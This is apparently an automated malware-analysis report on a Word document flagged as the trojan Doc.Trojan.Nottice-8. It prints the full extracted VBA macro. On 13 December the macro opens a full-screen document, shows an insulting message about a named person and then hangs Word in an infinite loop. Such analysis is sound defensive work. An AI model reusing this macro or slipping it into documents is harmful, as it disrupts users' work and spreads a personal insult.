MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is an OLE file containing VBA macros. The critical ClamAV heuristic indicates a known trojan, 'Doc.Trojan.Nottice-8'. The VBA macro code, when executed, attempts to display a large, attention-grabbing message and then enters an infinite loop. This behavior is consistent with malware designed to disrupt user interaction or potentially hide other malicious actions. No external network activity or file drops were observed in the static analysis.
Heuristics 1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 925 bytes |
SHA-256: 01800a49a67327b149761aa7a0bf093e46f9cd4f680afe687aad2a56511df201 |
|||
|
Detection
ClamAV:
Doc.Trojan.Nottice-8
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WININIT"
Public Sub MAIN()
If WordBasic.Day(WordBasic.Now()) = 13 And WordBasic.Month(WordBasic.Now()) = 12 Then
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Imprint MT Shadow"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "IMPORTAT NOTTICE!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "HANSSI A. A. IS MARRIED WITH A LOSSER."
HangOn:
GoTo HangOn
End If
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.